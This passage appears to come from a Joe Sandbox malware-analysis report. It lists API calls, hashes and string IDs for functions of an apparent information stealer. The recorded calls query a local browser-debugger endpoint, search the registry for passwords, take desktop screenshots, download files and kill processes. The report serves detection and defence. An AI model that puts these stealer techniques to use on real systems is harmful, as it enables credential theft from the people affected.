                          • Opcode Fuzzy Hash: 8f570686aba910e5c3dae83ffed475e111efd6864a550c839bd88b023e2bc73d
                          • Instruction Fuzzy Hash: 169169729012099FCB21DFA4D984EEEB7B9FB48310F15856EE509EB211DB31AE45CF90
                          APIs
                          • InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A90DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003A90FC
                          • InternetCloseHandle.WININET(00000000), ref: 003A9109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 003A9166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 003A9197
                          • InternetCloseHandle.WININET(00000000), ref: 003A91A2
                          • InternetCloseHandle.WININET(00000000), ref: 003A91A9
                          • strlen.MSVCRT ref: 003A91BA
                          • strlen.MSVCRT ref: 003A91ED
                          • strlen.MSVCRT ref: 003A922E
                          • strlen.MSVCRT ref: 003A924C
                            • Part of subcall function 003A8980: std::_Xinvalid_argument.LIBCPMT ref: 003A8996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: f4c9a80d58c42103bf9a51f231cbe5299afa4ce94384e31ae1d1f9604c740c64
                          • Instruction ID: 79e2496157be7a15d59bcd54498db789c6aee91c26c79045f2fb8330147c82c8
                          • Opcode Fuzzy Hash: f4c9a80d58c42103bf9a51f231cbe5299afa4ce94384e31ae1d1f9604c740c64
                          • Instruction Fuzzy Hash: 5351D471A10205ABD722DBA8DC45FEEF7B9DF54710F14006BF544E7280DBB4EA4887A1
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003C16A1
                          • lstrcpy.KERNEL32(00000000,00F1A620), ref: 003C16CC
                          • lstrlen.KERNEL32(?), ref: 003C16D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C16F6
                          • lstrcat.KERNEL32(00000000,?), ref: 003C1704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C172A
                          • lstrlen.KERNEL32(00F2E1A8), ref: 003C173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1762
                          • lstrcat.KERNEL32(00000000,00F2E1A8), ref: 003C176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1792
                          • ShellExecuteEx.SHELL32(?), ref: 003C17CD
                          • ExitProcess.KERNEL32 ref: 003C1803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: 95b1ff5b8709dc9e2ffee27eb168771b0cf89f70da74872e7c428e40025af94b
                          • Instruction ID: e0a8acf15762c53a583aec0f355c95c46bbe2f8b51cb81b89163cf3d2198a7f9
                          • Opcode Fuzzy Hash: 95b1ff5b8709dc9e2ffee27eb168771b0cf89f70da74872e7c428e40025af94b
                          • Instruction Fuzzy Hash: 4F518571E0221AABDB22DFA4DC84A9FB7F9EF55300F15412AE505E7251EF30AE05DB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003BF026
                          • lstrlen.KERNEL32(00000000), ref: 003BF035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 003BF053
                          • StrStrA.SHLWAPI(00000000,?), ref: 003BF081
                          • lstrlen.KERNEL32(?), ref: 003BF094
                          • lstrlen.KERNEL32(00000000), ref: 003BF0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 003BF0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 003BF13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 97761c748e045e8ac17f55fa45dfe0a1770ea3282ff7e9ad3ca8a522ea372364
                          • Instruction ID: 8fbb19ebc81004b31fdd39d6acc128869808dfe3941c98f9cbc1367a9e8ec73f
                          • Opcode Fuzzy Hash: 97761c748e045e8ac17f55fa45dfe0a1770ea3282ff7e9ad3ca8a522ea372364
                          • Instruction Fuzzy Hash: AF518B31A112059FCB33AB7CDC49AAF77A5EF51704F06546AF9469BA22EB30DC01CB90
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(00F29328,005D9BD8,0000FFFF), ref: 003AA026
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AA053
                          • lstrlen.KERNEL32(005D9BD8), ref: 003AA060
                          • lstrcpy.KERNEL32(00000000,005D9BD8), ref: 003AA08A
                          • lstrlen.KERNEL32(003D4C4C), ref: 003AA095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AA0B2
                          • lstrcat.KERNEL32(00000000,003D4C4C), ref: 003AA0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AA0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AA0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AA114
                          • SetEnvironmentVariableA.KERNEL32(00F29328,00000000), ref: 003AA12F
                          • LoadLibraryA.KERNEL32(00F16178), ref: 003AA143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 5f540f1c2c3cdac616e91e3199d32d074947d99acf17df086219063482d74db4
                          • Instruction ID: c077b18936a3e3cc6de3eb30819eb2fecf96307a606dd003525d12c51b256c6c
                          • Opcode Fuzzy Hash: 5f540f1c2c3cdac616e91e3199d32d074947d99acf17df086219063482d74db4
                          • Instruction Fuzzy Hash: 3291D132A01E009FD7329FA8DC84A7637A5EB66704F42051FE4058B6A2EFB5DC44DB82
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BC8A2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BC8D1
                          • lstrlen.KERNEL32(00000000), ref: 003BC8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BC932
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003BC943
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 82bf8302199252945979082b832f52c326afda4c6d633774eac7c1e68c0e98af
                          • Instruction ID: 66a71b08c753120e291948859e95aba7a49507b417dbfd333e30e4a504aa9f3c
                          • Opcode Fuzzy Hash: 82bf8302199252945979082b832f52c326afda4c6d633774eac7c1e68c0e98af
                          • Instruction Fuzzy Hash: 2761C371E212199BDB32EFB8DC48AEF7BB8EF15744F05106AE942EB601D7349D058B90
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,003C0CF0), ref: 003C4276
                          • GetDesktopWindow.USER32 ref: 003C4280
                          • GetWindowRect.USER32(00000000,?), ref: 003C428D
                          • SelectObject.GDI32(00000000,00000000), ref: 003C42BF
                          • GetHGlobalFromStream.COMBASE(003C0CF0,?), ref: 003C4336
                          • GlobalLock.KERNEL32(?), ref: 003C4340
                          • GlobalSize.KERNEL32(?), ref: 003C434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 4c89c49a7ed5bcb7ee6a1e12594ebeb3d1949f25076fddee011d7400f1e7a27a
                          • Instruction ID: a167fcfa3cc7d70d54f47bc37425d8837d274578b1eb72fc1567c5ca731b7f67
                          • Opcode Fuzzy Hash: 4c89c49a7ed5bcb7ee6a1e12594ebeb3d1949f25076fddee011d7400f1e7a27a
                          • Instruction Fuzzy Hash: A6514075A11209AFDB21DFA4EC89EEEB7B9EF58300F10441AF905E7250DB34AD05DBA0
                          APIs
                          • lstrcat.KERNEL32(?,00F2EBF0), ref: 003BE00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BE037
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE07D
                          • lstrcat.KERNEL32(?,?), ref: 003BE098
                          • lstrcat.KERNEL32(?,?), ref: 003BE0AC
                          • lstrcat.KERNEL32(?,00F1A5F8), ref: 003BE0C0
                          • lstrcat.KERNEL32(?,?), ref: 003BE0D4
                          • lstrcat.KERNEL32(?,00F2DB20), ref: 003BE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003BE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: 9732761ecf1f2f6f670101db03317e884c4558448978507cd9f3f311d2d30e0e
                          • Instruction ID: f7649c830ba416c1255b27628034e0da12fd6c7e7d569217a76f640336ceab92
                          • Opcode Fuzzy Hash: 9732761ecf1f2f6f670101db03317e884c4558448978507cd9f3f311d2d30e0e
                          • Instruction Fuzzy Hash: 6C61937191111CEBCB26EB68DC48ADE77B8FF58300F1449A6E60997250EF709F859F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A6AFF
                          • InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A6B2C
                          • StrCmpCA.SHLWAPI(?,00F2F170), ref: 003A6B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 003A6B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003A6B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003A6BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003A6BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003A6BF0
                          • CloseHandle.KERNEL32(00000000), ref: 003A6C10
                          • InternetCloseHandle.WININET(00000000), ref: 003A6C17
                          • InternetCloseHandle.WININET(?), ref: 003A6C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: eb6b30dd5835c0c65c0624340289973ec9a2e72fbc49d6c0f9e8b04e6f9a2857
                          • Instruction ID: 160989a70185b889ef1a4e8b1f58ee21749c23877ee4fa4d9dbe9bcca36d4875
                          • Opcode Fuzzy Hash: eb6b30dd5835c0c65c0624340289973ec9a2e72fbc49d6c0f9e8b04e6f9a2857
                          • Instruction Fuzzy Hash: 7541C371A01205ABDB21DFA4DC4AFAE77BCEF14700F04445AFA05EB290EF70AD049BA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003B4F39), ref: 003C4545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C454C
                          • wsprintfW.USER32 ref: 003C455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003C45CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003C45D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 003C45E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9O;$%hs$9O;
                          • API String ID: 885711575-2038196370
                          • Opcode ID: 8f36e1bbd942422165aacfbb20132293af2d822a1fd32ae410b21fef409f75b9
                          • Instruction ID: 72ccf6c815a73f4a0c2c62c63c907acfde36b1889fe84cd260c23386c60326c3
                          • Opcode Fuzzy Hash: 8f36e1bbd942422165aacfbb20132293af2d822a1fd32ae410b21fef409f75b9
                          • Instruction Fuzzy Hash: B0314372A01205BBEB21DBE4DC49FEE7779FF55700F10405AFA05E7180DB706A458BA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ABC1F
                          • lstrlen.KERNEL32(00000000), ref: 003ABC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ABC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABCAC
                          • lstrlen.KERNEL32(003D4AD4), ref: 003ABD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: a0fe4fbf6eee39b81665996e38380d79f3433ea0ea46233e0c454f49d7e35346
                          • Instruction ID: d95b27a8db031a5d9266866de380ed0fc84ceb277bbaeb6d522d375a9bbe6214
                          • Opcode Fuzzy Hash: a0fe4fbf6eee39b81665996e38380d79f3433ea0ea46233e0c454f49d7e35346
                          • Instruction Fuzzy Hash: 80A16030A11205CFCB26EF68D949AAEF7B5EF56304F19806EE406DB262DB31DC45CB90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 003C6014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 003C609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C60D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 35b8177573895280e4e666a742ae584a5f3da1b76cd9852c1978866351352e78
                          • Instruction ID: dc0df9acb425fb3b69b49848817053a6512197e6337db1cf745b53311790ef03
                          • Opcode Fuzzy Hash: 35b8177573895280e4e666a742ae584a5f3da1b76cd9852c1978866351352e78
                          • Instruction Fuzzy Hash: AE619C70714614DBDB2ACF5CCC96E6EB3BAEF84304B244A1DE492DB781D731AD808B95
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE07D
                          • lstrcat.KERNEL32(?,?), ref: 003BE098
                          • lstrcat.KERNEL32(?,?), ref: 003BE0AC
                          • lstrcat.KERNEL32(?,00F1A5F8), ref: 003BE0C0
                          • lstrcat.KERNEL32(?,?), ref: 003BE0D4
                          • lstrcat.KERNEL32(?,00F2DB20), ref: 003BE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003BE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 1ddce73a9633f74054fdfd430123c1ecfe7d9f16f4f17ab9d4edbc8c50faf5fd
                          • Instruction ID: b6d7e9fb0803db0badd3a502d61e4ef5e7f91fac0dcb561110f8a24e65071b45
                          • Opcode Fuzzy Hash: 1ddce73a9633f74054fdfd430123c1ecfe7d9f16f4f17ab9d4edbc8c50faf5fd
                          • Instruction Fuzzy Hash: 0C418071911118EBCB26EB68DC49ADE73B4FF58300F1449A6F60A97651EF309F858F90
                          APIs
                            • Part of subcall function 003A77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003A7805
                            • Part of subcall function 003A77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003A784A
                            • Part of subcall function 003A77D0: StrStrA.SHLWAPI(?,Password), ref: 003A78B8
                            • Part of subcall function 003A77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003A78EC
                            • Part of subcall function 003A77D0: HeapFree.KERNEL32(00000000), ref: 003A78F3
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003A7A90
                          • lstrcat.KERNEL32(00000000,?), ref: 003A7ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 003A7ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 003A7AF0
                          • wsprintfA.USER32 ref: 003A7B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A7B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A7B47
                          • lstrcat.KERNEL32(00000000,003D4AD4), ref: 003A7B60
                          Strings
                          Memory Dump Source
